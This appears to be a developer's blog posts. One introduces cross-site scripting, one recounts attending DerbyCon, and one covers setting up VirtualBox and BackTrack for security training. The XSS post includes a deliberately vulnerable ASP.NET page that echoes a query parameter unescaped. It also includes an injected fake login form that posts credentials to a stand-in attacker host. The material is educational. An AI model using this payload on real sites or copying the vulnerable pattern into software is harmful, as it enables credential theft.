I don’t run into a lot of web application developers who spend a lot of time thinking about security. I don’t know why. They’re usually under some stress to meet a deadline they didn’t have input on to meet business objectives that shift on a daily business. It’s not easy hitting a moving target, and some things get missed. Business users aren’t often savvy to security, so, there’s little reward to the application developer who spends extra time “battening down the hatches”. I get it, but, time has not been kind to web security matters. It seems like every day we’re hearing about more exploits using the problems identified a decade ago.
CSS/XSS (Cross site scripting) has been around a long time. It’s fairly easy to understand.
Here’s a simple example (caveat: you would have to compile this with .Net 2.0)
<head> <title></title> </head> <body> <form action="/pwned.aspx" method="get"> <input type=text id="name" name="name" /> <input type="submit" value="Submit" /> </form> </body> </html>
<%@ Page ValidateRequest="false" Language="C#" AutoEventWireup="true" CodeBehind="pwned.aspx.cs" Inherits="jqPlotTest.pwned" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> </head> <body> <form id="form1" runat="server"> <div> <% string name = Page.Request.QueryString["name"]; Page.Response.Write("<h1>Name: "+name); %> </div> </form> </body> </html>
Okay, so what?
What if it inserted a form asking the user to input their user credentials instead of popping up an alert box and threw in some CSS (Cascading Style Sheets this time) to make it look a little nicer?
Here’s the string:
Oops. We could not verify that username.<FORM ACTION="http://www. mischievous.com/receivingxsspost.php" METHOD="post"><center><table><tr><td>Please verify your authentication information:</td></tr><tr><td>Username: <input type="text" name="login" style="color: #781351;background: #fee3ad;border: 1px solid #781351" /></td></tr><tr><td>Password:<input type="text" name="password" style="color: #781351;background: #fee3ad;border: 1px solid #781351" /></td></tr><tr><td><input type="submit" value="Submit" style="color: #000;background: #ffa20f;border: 2px outset #d7b9c9" /></td></tr></table></center></form>
If the user fills out their username and password it will post that information to http://www. mischievous.com/receivingxsspost.php. Probably not what you wanted your users doing.
This brings us to XSS categorization:
- Reflected: This is the “easy” one; we did it in the first example.
- Stored: Scripts that are injected directly into a web applications database or cache or any sort of storage mechanism that’s going to be reused and abused outside of the current session (i.e. impacts multiple users).
These can let us do “Man in the Middle attacks” where your authentication, verification, passwords, and certificates are rendered somewhat helpless since your trusted user is unwittingly sending their credentials (or whatever) out to another website.
Okay, so we demonstrated a vulnerability in technology that is “ancient”… Well, luckily for the really lazy hackers, there are resources like this one to tell you about all the latest vulnerabilities:
XSS is a good thing for web developers to pay attention to. If you’re in .Net like me, Microsoft has a few things you may want to capitalize on as sort of an “easy” button for the problem:
AntiXSS 4.0 (released 10/5/2010): http://www.microsoft.com/download/en/details.aspx?id=5242
That doesn’t mean you’ve solved all your problems. You still have unclear business objectives and unreasonable timelines. It wouldn’t be fun if it was easy right?
Thanks for reading,
This weekend I attended DerbyCon [http://www.derbycon.com/], the new InfoSec (see: hacker) convention here in the midwest. It was hosted at the Hyatt in Louisville; a really nice town which also had an art show going on so my wife was happy to join me for the weekend and see the art. The con was founded by three fellows:
- Dave “ReL1K” Kennedy
- Martin “Pure Hate” Bos
- Adrian “Irongeek” Crenshaw
I was also fortunate to attend the training these guys put on Friday and Saturday on “Social-Engineering, CUDA Cracking, and PHUKD — OH MY”. This training was extremely technical and required me to do a lot of homework and preparation and I was still treading water pretty hard both nights. As part of the training, I setup a Windows 7 laptop running Oracle’s VirtualBox with two virtual machines. One running BackTrack Linux 5 (Ubuntu 64bit) which I detailed here [http://mdukehall.wordpress.com/2011/09/13/security-training-preparation/] and the other a simple XP box with service pack 2. The point is to setup a safe virtual area to test the exploits against.
My original goal with this training was to put my web applications to the security test and see what I can learn about securing web applications outside what’s obvious. Looking back on the weekend, I’ve gotten that plus a much wider view (and respect) of the serious challenges facing us. Particularly with the resurgence of client side scripting through JQuery.
The path ahead is fairly clear: educate and communicate. For now, I’ll be educating myself and posting my findings as I go.
As a bonus I saw Kevin Mitnick (http://en.wikipedia.org/wiki/Kevin_Mitnick) speak. Years ago when he was in the news I read Takedown (http://www.takedown.com/) about his capture and arrest. It was nice to see that since his release he found a way to do what he loves legally and profitably. His talk revolved around several penetration tests is which he was able to highlight social engineering as well as physical security compromises. Hearing these stories was eye opening. His main point seemed to be that it isn’t hard because people try and be helpful and trusting. I’m not sure I like the “lesson” that people need to be paranoid and unhelpful, but, I’ll take it into consideration. Aside from that, it was interesting to hear stories that match the ideas behind movies like Sneakers.
With DerbyCon three weeks away, I’ve started ramping up by reading books on security and getting a laptop setup for the training. It’ll be 12 hour days of veterans and noobs showing off their black and white hat stuff.
The training requires a laptop with 2 virtual machines setup; one for XP and one for BackTrack Linux (Ubuntu). When it comes to virtualization, my inclination was to use Microsoft’s Hyper-V. The internet quickly informed me that my Windows 7 laptop isn’t able to support Hyper-V… It also informed me that Oracle’s VirtualBox has no problem running on Windows 7 and doing what I need and is free. I do enjoy eating out of Microsoft’s dog bowl, but they often do things like this that “force” me to leave their nest. Sort of like when they dragged their feet on getting a good ORM so we “had” to use SubSonic (which I heard rumors that it was mostly created by MS or ex-MS eployees) because it was so elegant and efficient at generating all that ADO nonsense Anyway…
Virtual Box comes with many OS flavors ready to go.
Setting up a VM with BackTrack Linux was as easy as following the instructions here: : http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install
The goal of the preparation will be to have a virtual network with 1 server running XP (or whatever you want to run security checks against) and one running Linux where you simulate attacks against the XP box. My goal in learning this is more to teach myself about Web and WinForms Application security. There are a lot of people that know the networking side and it appears that the industry thinks it has a good handle on that side with firewalls and patch management and tripwire type programs to watch the perimeters. I’m more interested in how nations full of growing computer scientists might dismantle my humble web applications and how to stop them from embarrassing me.
Look forward to more technical posts in the coming month.